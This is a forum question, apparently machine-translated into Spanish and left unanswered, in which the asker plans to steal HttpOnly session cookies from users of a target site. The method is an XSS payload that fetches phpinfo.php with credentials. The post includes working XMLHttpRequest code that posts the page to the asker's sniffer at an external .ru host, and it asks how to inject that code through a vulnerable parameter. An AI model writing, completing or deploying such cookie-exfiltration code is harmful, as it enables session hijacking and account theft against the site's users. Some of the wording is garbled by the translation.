¿Usar phpinfo () para obtener cookies httponly?

1

phpinfo () muestra todas las cookies, incluso las httponly. Entonces, la pregunta es: ¿cómo puedo recibir cocineros de los usuarios en el sitio web de destino a través de xss con phpinfo? El xss contendrá código que abrirá la página phpinfo en segundo plano (como un popunder) y luego, utilizando xhtmlRequest enviará el contenido de la página a mi página web sniffer. La pregunta es: no estoy realmente caliente para poner esto juntos. Lo estoy viendo de esta manera:

  1. xss contendrá
  2. evil.js abrirá xhtmlRequest GET para obtener la página de phpinfo con datos de cookies
  3. evil.js publicará datos en mi sniffer

¿Es esta la forma correcta de hacer esto o quizás hay un enfoque más apropiado? ¡Gracias!

UPD: escribí un ejemplo,

var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange= function() {
if (xhttp.readyState == 4 && xhttp.status == 200) {

        var body = encodeURIComponent(xhttp.responseText);
        xhttp.open("POST", 'http://mysniff.ru/t.php', true)
        xhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded')
        xhttp.send(body)

    }
};

xhttp.open("GET", "phpinfo.php", true);
xhttp.withCredentials = true;
xhttp.send();

¿Funcionará si incluyo este código como script src? ¿O solo debo urlencodificarlo y pasarlo a un parámetro vulnerable para que funcione?

    
pregunta user3416803 10.04.2016 - 10:39
fuente

0 respuestas

Lea otras preguntas en las etiquetas